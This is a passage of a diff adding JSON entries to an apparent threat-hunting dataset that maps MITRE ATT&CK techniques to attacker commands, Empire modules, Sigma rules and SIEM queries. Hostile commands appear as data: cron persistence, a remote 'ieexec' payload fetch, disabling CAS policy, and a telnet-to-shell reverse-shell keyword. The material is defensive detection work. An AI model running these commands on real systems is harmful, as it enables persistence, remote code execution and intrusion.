"osascript", + "commandline_string": "-e 'tell app \"System Preferences\" to activate'", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "high", + "mitre_caption": "applescript", + "mitre_attack": "T1155", + "itw_sample": "" + }, + { + "Empire Module": "python/persistence/osx/mail", + "ATT&CK Technique #1": "T1155", + "ATT&CK Technique #2": "T1108", + "Technique": "AppleScript", + "Concatenate for Python Dictionary": "\"python/persistence/osx/mail\": [\"T1155\",\"T1108\"]," + } + ], + "queries": [], + "possible_detections": [], + "external_reference": [] + }, + { + "technique_id": "T1168", + "command_list": [ + "bash crontab", + "shell crontab", + "python/persistence/multi/crontab", + "echo \"* * * * * #{command}\" > #{tmp_cron} && crontab #{tmp_cron}", + "echo \"#{command}\" > /etc/cron.daily/#{cron_script_name}", + "at now + 1 minute -f script.sh", + "echo \"shutdown -h now\" | at -m 23:5", + "at now + 1 minute | ping -c 4 google.com > /home/ec2-user/google6.txt" + ], + "commands": [ + { + "command": "bash crontab", + "source": "Threat Hunting Tables", + "name": "" + }, + { + "command": "shell crontab", + "source": "Threat Hunting Tables", + "name": "" + }, + { + "command": "python/persistence/multi/crontab", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "echo \"* * * * * #{command}\" > #{tmp_cron} && crontab #{tmp_cron}", + "source": "Kirtar22/Litmus_Test", + "name": "" + }, + { + "command": "echo \"#{command}\" > /etc/cron.daily/#{cron_script_name}", + "source": "Kirtar22/Litmus_Test", + "name": "" + }, + { + "command": "at now + 1 minute -f script.sh", + "source": "Kirtar22/Litmus_Test", + "name": "" + }, + { + "command": "echo \"shutdown -h now\" | at -m 23:5", + "source": "Kirtar22/Litmus_Test", + "name": "" + }, + { + "command": "at 
now + 1 minute | ping -c 4 google.com > /home/ec2-user/google6.txt", + "source": "Kirtar22/Litmus_Test", + "name": "" + } + ], + "parsed_datasets": [ + { + "chain_id": "100200", + "os": "mac", + "parent_process": "bash", + "commandline_string": "crontab", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "high", + "mitre_caption": "cron_job", + "mitre_attack": "T1168", + "itw_sample": "" + }, + { + "chain_id": "100202", + "os": "linux", + "parent_process": "shell", + "commandline_string": "crontab", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "high", + "mitre_caption": "cron_job", + "mitre_attack": "T1168", + "itw_sample": "" + }, + { + "Empire Module": "python/persistence/multi/crontab", + "ATT&CK Technique #1": "T1168", + "ATT&CK Technique #2": "", + "Technique": "Local Job Scheduling", + "Concatenate for Python Dictionary": "\"python/persistence/multi/crontab\": [\"T1168\"]," + } + ], + "queries": [ + { + "product": "Splunk", + "query": "1. bash_history : track the command \"crontab\" - you may need to look for the commands crontab ", + "name": "" + }, + { + "product": "Splunk", + "query": "", + "name": "" + }, + { + "product": "Splunk", + "query": "index=linux sourcetype=bash_history bash_command=\"crontab *\" | table host, user_name, bash_command", + "name": "" + }, + { + "product": "Splunk", + "query": "2. /var/log/cron : look for \"crontab\" & \"REPLACE\" in the cron logs", + "name": "" + }, + { + "product": "Splunk", + "query": "index=linux crontab replace", + "name": "" + }, + { + "product": "Splunk", + "query": "3. 
/var.log/cron - track CMD command", + "name": "" + }, + { + "product": "Splunk", + "query": "cat /var/log/cron | grep CMD | cut -d \" \" -f 9 |sort | uniq -c | sort -rn will give you all the jobs which run in the environment with its number starting from high to low. You can look for a suspecious job/s which are not a part of a whitelisted jobs.", + "name": "" + }, + { + "product": "Splunk", + "query": "4. index=linux sourcetype=bash_history at", + "name": "" + } + ], + "possible_detections": [ + "/var/log/cron", + "bash_history" + ], + "external_reference": [] + }, + { + "technique_id": "T1158", + "command_list": [ + "attrib.exe +s +h * appdata", + "```", + "mkdir .hidden-directory", + "mv file to a .file" + ], + "commands": [ + { + "command": "attrib.exe +s +h * appdata", + "source": "Threat Hunting Tables", + "name": "" + }, + { + "command": "```", + "source": "Kirtar22/Litmus_Test", + "name": "" + }, + { + "command": "mkdir .hidden-directory", + "source": "Kirtar22/Litmus_Test", + "name": "" + }, + { + "command": "mv file to a .file", + "source": "Kirtar22/Litmus_Test", + "name": "" + } + ], + "parsed_datasets": [ + { + "chain_id": "100207", + "os": "windows", + "parent_process": "attrib.exe", + "commandline_string": "+s +h * appdata", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "low", + "mitre_caption": "hidden_files_dirs", + "mitre_attack": "T1158", + "itw_sample": "62b623a8dd6f7bfa7d1cff7b9db19f948840f36bee5c9063eaf5b898beb23c68" + } + ], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 1and process_path contains \"attrib.exe\"and (process_command_line contains \"+h\"or process_command_line contains \"+s\")", + "name": "Hidden Files And Directories" + }, + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 1and (process_path contains \"*\\\\VolumeShadowCopy*\\\\*\"or 
process_command_line contains \"*\\\\VolumeShadowCopy*\\\\*\")", + "name": "Hidden Files And Directories VSS" + }, + { + "product": "Splunk", + "query": "There are 2 ways by which we can capture this", + "name": "" + }, + { + "product": "Splunk", + "query": "```", + "name": "" + }, + { + "product": "Splunk", + "query": "index=linux sourcetype=bash_history bash_command=\"mkdir .*\" | table host,user_name,bash_command", + "name": "" + }, + { + "product": "Splunk", + "query": "```", + "name": "" + }, + { + "product": "Splunk", + "query": "```", + "name": "" + }, + { + "product": "Splunk", + "query": "index=linux sourcetype=bash_history bash_command=\"mv * .*\" | table host,user_name,bash_command", + "name": "" + }, + { + "product": "Splunk", + "query": "```", + "name": "" + }, + { + "product": "Splunk", + "query": "find_hidden_files.sh script can be run on a regular interval and check for any suspecious file creation. A whitelist can be craeted to filter out the standard hidden files/directories in a linux system.", + "name": "" + }, + { + "product": "Splunk", + "query": "```", + "name": "" + }, + { + "product": "Splunk", + "query": "find /home/ -name \".*\"", + "name": "" + }, + { + "product": "Splunk", + "query": "find /home/ -type d -name \".*\"", + "name": "" + }, + { + "product": "Splunk", + "query": "find /home/ -type f -name \".*\"", + "name": "" + }, + { + "product": "Splunk", + "query": "```", + "name": "" + } + ], + "possible_detections": [ + "bash_history logs", + "find the hidden files/dirs from certain directory paths like (/home/$user) and dump it to a location and ingest the file and look for any malicious hidden files (scripted input to the Splunk)", + { + "title": "Hiding files with attrib.exe", + "id": "4281cb20-2994-4580-aa63-c8b86d019934", + "status": "experimental", + "description": "Detects usage of attrib.exe to hide files from users.", + "author": "Sami Ruohonen", + "logsource": { + "category": "process_creation", + "product": "windows" + }, + 
"detection": { + "selection": { + "Image": "*\\attrib.exe", + "CommandLine": "* +h *" + }, + "ini": { + "CommandLine": "*\\desktop.ini *" + }, + "intel": { + "ParentImage": "*\\cmd.exe", + "CommandLine": "+R +H +S +A \\\\*.cui", + "ParentCommandLine": "C:\\WINDOWS\\system32\\\\*.bat" + }, + "condition": "selection and not (ini or intel)" + }, + "fields": [ + "CommandLine", + "ParentCommandLine", + "User" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.t1158" + ], + "falsepositives": [ + "igfxCUIService.exe hiding *.cui files via .bat script (attrib.exe a child of cmd.exe and igfxCUIService.exe is the parent of the cmd.exe)", + "msiexec.exe hiding desktop.ini" + ], + "level": "low" + }, + [ + "4663", + "File monitoring" + ], + [ + "4688", + "Process Execution" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "LMD", + "Hash Compae" + ], + [ + "4663", + "File monitoring" + ], + [ + "4688", + "Process Execution" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "LOG-MD", + "Hash Compae" + ] + ], + "external_reference": [ + "https://blog.trendmicro.com/trendlabs-security-intelligence/tropic-trooper-new-strategy/", + "https://securingtomorrow.mcafee.com/mcafee-labs/lazarus-resurfaces-targets-global-banks-bitcoin-users/", + "https://www.welivesecurity.com/2019/04/09/oceanlotus-macos-malware-update/", + "https://arstechnica.com/information-technology/2018/07/from-bitly-to-x-agent-how-gru-hackers-targeted-the-2016-presidential-election/" + ] + }, + { + "technique_id": "T1191", + "command_list": [ + "winword.exe", + "cmstp.exe", + "cmstp.exe/s|/ns|/au" + ], + "commands": [ + { + "command": "winword.exe", + "source": "Threat Hunting Tables", + "name": "parent_process" + }, + { + "command": "cmstp.exe", + "source": "Threat Hunting Tables", + "name": "sub_process_1" + }, + { + "command": "cmstp.exe/s|/ns|/au", + "source": "SysmonHunter - CMSTP", + "name": "" + } + ], + "parsed_datasets": [ + { + "chain_id": "100210", + "os": "windows", + 
"parent_process": "winword.exe", + "commandline_string": "", + "sub_process_1": "cmstp.exe", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "low", + "mitre_caption": "cmstp", + "mitre_attack": "T1191", + "itw_sample": "" + }, + { + "name": "CMSTP", + "description": null, + "level": "medium", + "phase": "Execution", + "query": [ + { + "type": "process", + "process": { + "image": { + "pattern": "cmstp.exe" + }, + "cmdline": { + "pattern": "/s|/ns|/au" + } + } + } + ] + } + ], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 1and process_path contains \"CMSTP.exe\"", + "name": "CMSTP" + } + ], + "possible_detections": [ + { + "action": "global", + "title": "CMSTP Execution", + "id": "9d26fede-b526-4413-b069-6e24b6d07167", + "status": "stable", + "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1191", + "attack.g0069", + "car.2019-04-001" + ], + "author": "Nik Seetharaman", + "references": [ + "http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/" + ], + "detection": { + "condition": "1 of them" + }, + "fields": [ + "CommandLine", + "ParentCommandLine", + "Details" + ], + "falsepositives": [ + "Legitimate CMSTP use (unlikely in modern enterprise environments)" + ], + "level": "high" + }, + { + "logsource": { + "product": "windows", + "service": "sysmon" + }, + "detection": { + "selection2": { + "EventID": 12, + "TargetObject": "*\\cmmgr32.exe*" + }, + "selection3": { + "EventID": 13, + "TargetObject": "*\\cmmgr32.exe*" + }, + "selection4": { + "EventID": 10, + "CallTrace": "*cmlua.dll*" + } + } + }, + { + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection1": { + "ParentImage": "*\\cmstp.exe" + } + } + }, + { + 
"title": "CMSTP UAC Bypass via COM Object Access", + "id": "4b60e6f2-bf39-47b4-b4ea-398e33cfe253", + "status": "stable", + "description": "Detects UAC Bypass Attempt Using Microsoft Connection Manager Profile Installer Autoelevate-capable COM Objects", + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.execution", + "attack.t1088", + "attack.t1191", + "attack.g0069", + "car.2019-04-001" + ], + "author": "Nik Seetharaman", + "modified": "2019/07/31", + "references": [ + "http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/", + "https://twitter.com/hFireF0X/status/897640081053364225" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection1": { + "ParentCommandLine": "*\\DllHost.exe" + }, + "selection2": { + "ParentCommandLine": [ + "*{3E5FC7F9-9A51-4367-9063-A120244FBEC7}", + "*{3E000D72-A845-4CD9-BD83-80C07C3B881F}" + ] + }, + "condition": "selection1 and selection2" + }, + "fields": [ + "CommandLine", + "ParentCommandLine", + "Hashes" + ], + "falsepositives": [ + "Legitimate CMSTP use (unlikely in modern enterprise environments)" + ], + "level": "high" + }, + [ + "4688", + "Process Execution" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "4688", + "Process Execution" + ], + [ + "4688 ", + "Process CMD Line" + ] + ], + "external_reference": [ + "https://www.fireeye.com/blog/threat-research/2018/03/iranian-threat-group-updates-ttps-in-spear-phishing-campaign.html", + "https://blog.talosintelligence.com/2018/07/multiple-cobalt-personality-disorder.html", + "https://blog.morphisec.com/cobalt-gang-2.0" + ] + }, + { + "technique_id": "T1100", + "command_list": [ + "ieexec.exe http://*:8080/bypass.exe" + ], + "commands": [ + { + "command": "ieexec.exe http://*:8080/bypass.exe", + "source": "Threat Hunting Tables", + "name": "" + } + ], + "parsed_datasets": [ + { + "chain_id": "100211", + "os": "windows", + "parent_process": 
"ieexec.exe", + "commandline_string": "http://*:8080/bypass.exe", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "web_shell", + "mitre_attack": "T1100", + "itw_sample": "https://github.com/api0cradle/LOLBAS/blob/master/OSBinaries/Ieexec.md" + }, + { + "Rules": "ET Open", + "SID": "*", + "Signature": "ET WEB_SERVER ATTACKER WebShell", + "Verified": "Yes" + } + ], + "queries": [ + { + "product": "Suricata (NSM)", + "query": "ET WEB_SERVER ATTACKER WebShell", + "name": "ET Open Rule" + } + ], + "possible_detections": [ + { + "title": "Antivirus Web Shell Detection", + "id": "fdf135a2-9241-4f96-a114-bb404948f736", + "description": "Detects a highly relevant Antivirus alert that reports a web shell", + "date": "2018/09/09", + "modified": "2019/10/04", + "author": "Florian Roth", + "references": [ + "https://www.nextron-systems.com/2018/09/08/antivirus-event-analysis-cheat-sheet-v1-4/" + ], + "tags": [ + "attack.persistence", + "attack.t1100" + ], + "logsource": { + "product": "antivirus" + }, + "detection": { + "selection": { + "Signature": [ + "PHP/Backdoor*", + "JSP/Backdoor*", + "ASP/Backdoor*", + "Backdoor.PHP*", + "Backdoor.JSP*", + "Backdoor.ASP*", + "*Webshell*" + ] + }, + "condition": "selection" + }, + "fields": [ + "FileName", + "User" + ], + "falsepositives": [ + "Unlikely" + ], + "level": "critical" + }, + { + "title": "Webshell Remote Command Execution", + "id": "c0d3734d-330f-4a03-aae2-65dacc6a8222", + "status": "experimental", + "description": "Detects posible command execution by web application/web shell", + "tags": [ + "attack.persistence", + "attack.t1100" + ], + "references": [ + "personal experience" + ], + "author": "Ilyas Ochkov, Beyu Denis, oscd.community", + "date": "2019/10/12", + "modified": "2019/11/04", + "logsource": { + "product": "linux", + "service": "auditd" + }, + "detection": { + 
"selection": { + "type": "SYSCALL", + "SYSCALL": "execve", + "key": "detect_execve_www" + }, + "condition": "selection" + }, + "falsepositives": [ + "Admin activity", + "Crazy web applications" + ], + "level": "critical" + }, + { + "title": "Windows webshell creation", + "id": "39f1f9f2-9636-45de-98f6-a4046aa8e4b9", + "status": "experimental", + "description": "Posible webshell file creation on a static web site", + "references": [ + "PT ESC rule and personal experience" + ], + "author": "Beyu Denis, oscd.community", + "date": "2019/10/22", + "modified": "2019/11/04", + "tags": [ + "attack.persistence", + "attack.t1100" + ], + "level": "critical", + "logsource": { + "product": "windows", + "service": "sysmon" + }, + "detection": { + "selection_1": { + "EventID": 11 + }, + "selection_2": { + "TargetFilename|contains": "\\inetpub\\wwwroot\\" + }, + "selection_3": { + "TargetFilename|contains": [ + ".asp", + ".ashx", + ".ph" + ] + }, + "selection_4": { + "TargetFilename|contains": [ + "\\www\\", + "\\htdocs\\", + "\\html\\" + ] + }, + "selection_5": { + "TargetFilename|contains": ".ph" + }, + "selection_6": [ + { + "TargetFilename|contains|all": [ + "\\", + ".jsp" + ] + }, + { + "TargetFilename|contains|all": [ + "\\cgi-bin\\", + ".pl" + ] + } + ], + "condition": "selection_1 and ( selection_2 and selection_3 ) or selection_1 and ( selection_4 and selection_5 ) or selection_1 and selection_6" + }, + "falsepositives": [ + "Legitimate administrator or developer creating legitimate executable files in a web application folder" + ] + }, + { + "title": "Execution in Webserver Root Folder", + "id": "35efb964-e6a5-47ad-bbcd-19661854018d", + "status": "experimental", + "description": "Detects a suspicious program execution in a web service root folder (filter out false positives)", + "author": "Florian Roth", + "tags": [ + "attack.persistence", + "attack.t1100" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": 
{ + "Image": [ + "*\\wwwroot\\\\*", + "*\\wmpub\\\\*", + "*\\htdocs\\\\*" + ] + }, + "filter": { + "Image": [ + "*bin\\\\*", + "*\\Tools\\\\*", + "*\\SMSComponent\\\\*" + ], + "ParentImage": [ + "*\\services.exe" + ] + }, + "condition": "selection and not filter" + }, + "fields": [ + "CommandLine", + "ParentCommandLine" + ], + "falsepositives": [ + "Various applications", + "Tools that include ping or nslookup command invocations" + ], + "level": "medium" + }, + { + "title": "IIS Native-Code Module Command Line Installation", + "id": "9465ddf4-f9e4-4ebd-8d98-702df3a93239", + "description": "Detects suspicious IIS native-code module installations via command line", + "status": "experimental", + "references": [ + "https://researchcenter.paloaltonetworks.com/2018/01/unit42-oilrig-uses-rgdoor-iis-backdoor-targets-middle-east/" + ], + "author": "Florian Roth", + "modified": "2012/12/11", + "tags": [ + "attack.persistence", + "attack.t1100" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "CommandLine": [ + "*\\APPCMD.EXE install module /name:*" + ] + }, + "condition": "selection" + }, + "falsepositives": [ + "Unknown as it may vary from organisation to arganisation how admins use to install IIS modules" + ], + "level": "medium" + }, + { + "title": "Webshell Detection With Command Line Keywords", + "id": "bed2a484-9348-4143-8a8a-b801c979301c", + "description": "Detects certain command line parameters often used during reconnaissance activity via web shells", + "author": "Florian Roth", + "reference": [ + "https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-ii.html" + ], + "date": "2017/01/01", + "modified": "2019/10/26", + "tags": [ + "attack.privilege_escalation", + "attack.persistence", + "attack.t1100" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "ParentImage": [ + 
"*\\apache*", + "*\\tomcat*", + "*\\w3wp.exe", + "*\\php-cgi.exe", + "*\\nginx.exe", + "*\\httpd.exe" + ], + "CommandLine": [ + "*whoami*", + "*net user *", + "*ping -n *", + "*systeminfo", + "*&cd&echo*", + "*cd /d*" + ] + }, + "condition": "selection" + }, + "fields": [ + "CommandLine", + "ParentCommandLine" + ], + "falsepositives": [ + "unknown" + ], + "level": "high" + }, + { + "title": "Shells Spawned by Web Servers", + "id": "8202070f-edeb-4d31-a010-a26c72ac5600", + "status": "experimental", + "description": "Web servers that spawn shell processes could be the result of a successfully placed web shell or an other attack", + "author": "Thomas Patzke", + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "ParentImage": [ + "*\\w3wp.exe", + "*\\httpd.exe", + "*\\nginx.exe", + "*\\php-cgi.exe" + ], + "Image": [ + "*\\cmd.exe", + "*\\sh.exe", + "*\\bash.exe", + "*\\powershell.exe" + ] + }, + "condition": "selection" + }, + "fields": [ + "CommandLine", + "ParentCommandLine" + ], + "tags": [ + "attack.privilege_escalation", + "attack.persistence", + "attack.t1100" + ], + "falsepositives": [ + "Particular web applications may spawn a shell process legitimately" + ], + "level": "high" + }, + [ + "4688", + "Process Execution" + ], + [ + "4663", + "File monitoring" + ], + [ + "4624", + " 4625", + "Authentication logs" + ], + [ + "Netflow/Enclave netflow" + ], + [ + "Anti-virus" + ], + [ + "4688", + "Process Execution" + ], + [ + "4663", + "File monitoring" + ], + [ + "4624", + " 4625", + "Authentication logs" + ], + [ + "Netflow/Enclave netflow" + ], + [ + "Anti-virus" + ] + ], + "external_reference": [ + "https://www.volexity.com/blog/2017/11/06/oceanlotus-blossoms-mass-digital-surveillance-and-exploitation-of-asean-nations-the-media-human-rights-and-civil-society/", + "https://www.brighttalk.com/webcast/10703/296317/apt34-new-targeted-attack-in-the-middle-east", + 
"https://www.us-cert.gov/ncas/alerts/TA17-293A", + "https://pan-unit42.github.io/playbook_viewer/", + "https://www.fireeye.com/blog/threat-research/2019/03/apt40-examining-a-china-nexus-espionage-actor.html", + "http://www.crowdstrike.com/blog/mo-shells-mo-problems-deep-panda-web-shells/", + "https://www.fireeye.com/blog/threat-research/2019/04/triton-actor-ttp-profile-custom-attack-tools-detections.html", + "https://www.us-cert.gov/ncas/alerts/TA18-074A", + "https://www.fireeye.com/blog/threat-research/2019/01/apt39-iranian-cyber-espionage-group-focused-on-personal-information.html" + ] + }, + { + "technique_id": "T1101", + "command_list": [ + "caspol.exe -s off", + "SYSTEM\\CurrentControlSet\\Control\\Lsa\\Security Packages|SYSTEM\\CurrentControlSet\\Control\\Lsa\\OSConfig\\Security Packages", + "powershell/persistence/misc/get_ssps", + "powershell/persistence/misc/install_ssp", + "powershell/persistence/misc/memssp" + ], + "commands": [ + { + "command": "caspol.exe -s off", + "source": "Threat Hunting Tables", + "name": "" + }, + { + "command": "SYSTEM\\CurrentControlSet\\Control\\Lsa\\Security Packages|SYSTEM\\CurrentControlSet\\Control\\Lsa\\OSConfig\\Security Packages", + "source": "SysmonHunter - Security Support Provider", + "name": "" + }, + { + "command": "powershell/persistence/misc/get_ssps", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/persistence/misc/install_ssp", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/persistence/misc/memssp", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + } + ], + "parsed_datasets": [ + { + "chain_id": "100212", + "os": "windows", + "parent_process": "caspol.exe", + "commandline_string": "-s off", + 
"sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "web_shell", + "mitre_attack": "T1101", + "itw_sample": "https://github.com/api0cradle/LOLBAS/blob/master/OSBinaries/Ieexec.md" + }, + { + "name": "Security Support Provider", + "description": null, + "level": "medium", + "phase": "Persistence", + "query": [ + { + "type": "reg", + "reg": { + "path": { + "pattern": "SYSTEM\\CurrentControlSet\\Control\\Lsa\\Security Packages|SYSTEM\\CurrentControlSet\\Control\\Lsa\\OSConfig\\Security Packages" + } + } + }, + { + "type": "process", + "process": { + "cmdline": { + "pattern": "SYSTEM\\CurrentControlSet\\Control\\Lsa\\Security Packages|SYSTEM\\CurrentControlSet\\Control\\Lsa\\OSConfig\\Security Packages" + } + } + } + ] + }, + { + "Empire Module": "powershell/persistence/misc/get_ssps", + "ATT&CK Technique #1": "T1101", + "ATT&CK Technique #2": "", + "Technique": "Security Support Provider", + "Concatenate for Python Dictionary": "\"powershell/persistence/misc/get_ssps\": [\"T1101\"]," + }, + { + "Empire Module": "powershell/persistence/misc/install_ssp", + "ATT&CK Technique #1": "T1101", + "ATT&CK Technique #2": "", + "Technique": "Security Support Provider", + "Concatenate for Python Dictionary": "\"powershell/persistence/misc/install_ssp\": [\"T1101\"]," + }, + { + "Empire Module": "powershell/persistence/misc/memssp", + "ATT&CK Technique #1": "T1101", + "ATT&CK Technique #2": "", + "Technique": "Security Support Provider", + "Concatenate for Python Dictionary": "\"powershell/persistence/misc/memssp\": [\"T1101\"]," + } + ], + "queries": [], + "possible_detections": [ + [ + "4657", + "Windows Registry" + ], + [ + "Loaded DLLs" + ], + [ + "DLL monitoring" + ], + [ + "Sysmon ID 7", + "DLL monitoring" + ], + [ + "4657", + "Windows Registry" + ], + [ + "Sysmon ID 7", + "Loaded DLLs" + ] + ], + "external_reference": [] + }, + { + 
"technique_id": "T1042", + "command_list": [ + "\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\FileExts|HKCR\\\\.+\\\\shell\\\\open\\\\commandWindows\\Explorer.EXE", + "assoc.exe" + ], + "commands": [ + { + "command": "\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\FileExts|HKCR\\\\.+\\\\shell\\\\open\\\\commandWindows\\Explorer.EXE", + "source": "SysmonHunter - Change Default File Association", + "name": "" + }, + { + "command": "assoc.exe", + "source": "SysmonHunter - Change Default File Association", + "name": "" + } + ], + "parsed_datasets": [ + { + "name": "Change Default File Association", + "description": null, + "level": "medium", + "phase": "Persistence", + "query": [ + { + "type": "reg", + "reg": { + "path": { + "pattern": "\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\FileExts|HKCR\\\\.+\\\\shell\\\\open\\\\command", + "flag": "regex" + } + }, + "process": { + "image": { + "pattern": "Windows\\Explorer.EXE", + "op": "not" + } + }, + "op": "and" + }, + { + "type": "process", + "process": { + "any": { + "pattern": "assoc.exe" + } + } + } + ] + } + ], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where (EventID == 12 or EventID == 13 or EventID == 14)and (registry_key_path contains \"\\\\SOFTWARE\\\\Classes\\\\\"or registry_key_path contains \"\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\GlobalAssocChangedCounter\")", + "name": "Change Default File Association" + } + ], + "possible_detections": [ + { + "title": "Change Default File Association", + "id": "3d3aa6cd-6272-44d6-8afc-7e88dfef7061", + "status": "experimental", + "description": "When a file is opened, the default program used to open the file (also called the file association or handler) is checked. 
File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.", + "author": "Timur Zinniatullin, oscd.community", + "date": "2019/10/21", + "modified": "2019/11/04", + "references": [ + "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1042/T1042.yaml" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "CommandLine|contains|all": [ + "cmd", + "/c", + "assoc" + ] + }, + "condition": "selection" + }, + "falsepositives": [ + "Admin activity" + ], + "fields": [ + "Image", + "CommandLine", + "User", + "LogonGuid", + "Hashes", + "ParentProcessGuid", + "ParentCommandLine" + ], + "level": "low", + "tags": [ + "attack.persistence", + "attack.t1042" + ] + }, + [ + "4657", + "Windows Registry" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "4688", + "Process Execution" + ], + [ + "4657", + "Windows Registry" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "4688", + "Process Execution" + ] + ], + "external_reference": [] + }, + { + "technique_id": "T1059", + "command_list": [ + "\\\\Windows\\\\.+\\\\cmd.exe", + "cmd.exe|/c", + "powershell/lateral_movement/invoke_sqloscmd", + "powershell/management/spawnas" + ], + "commands": [ + { + "command": "\\\\Windows\\\\.+\\\\cmd.exe", + "source": "SysmonHunter - Command-Line Interface", + "name": "" + }, + { + "command": "cmd.exe|/c", + "source": "SysmonHunter - Command-Line Interface", + "name": "" + }, + { + "command": "powershell/lateral_movement/invoke_sqloscmd", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/management/spawnas", + 
"source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + } + ], + "parsed_datasets": [ + { + "name": "Command-Line Interface", + "description": null, + "level": "medium", + "phase": "Execution", + "query": [ + { + "type": "process", + "process": { + "image": { + "pattern": "\\\\Windows\\\\.+\\\\cmd.exe", + "flag": "regex" + } + } + }, + { + "type": "process", + "process": { + "cmdline": { + "pattern": "cmd.exe|/c", + "op": "and" + } + } + } + ] + }, + { + "Empire Module": "powershell/lateral_movement/invoke_sqloscmd", + "ATT&CK Technique #1": "T1059", + "ATT&CK Technique #2": "", + "Technique": "Command-Line Interface", + "Concatenate for Python Dictionary": "\"powershell/lateral_movement/invoke_sqloscmd\": [\"T1059\"]," + }, + { + "Empire Module": "powershell/management/spawnas", + "ATT&CK Technique #1": "T1059", + "ATT&CK Technique #2": "", + "Technique": "Command-Line Interface", + "Concatenate for Python Dictionary": "\"powershell/management/spawnas\": [\"T1059\"]," + } + ], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 1 and process_path contains \"cmd.exe\"", + "name": "Command Line Interface" + } + ], + "possible_detections": [ + { + "title": "Equation Group Indicators", + "id": "41e5c73d-9983-4b69-bd03-e13b67e9623c", + "description": "Detects suspicious shell commands used in various Equation Group scripts and tools", + "references": [ + "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" + ], + "tags": [ + "attack.execution", + "attack.g0020", + "attack.t1059" + ], + "author": "Florian Roth", + "logsource": { + "product": "linux" + }, + "detection": { + "keywords": [ + "chown root*chmod 4777 ", + "cp /bin/sh .;chown", + "chmod 4777 /tmp/.scsi/dev/bin/gsh", + "chown root:root /tmp/.scsi/dev/bin/", + "chown root:root x;", + "/bin/telnet locip locport < /dev/console | /bin/sh", + "/tmp/ratload", + "ewok -t ", + "xspy -display 
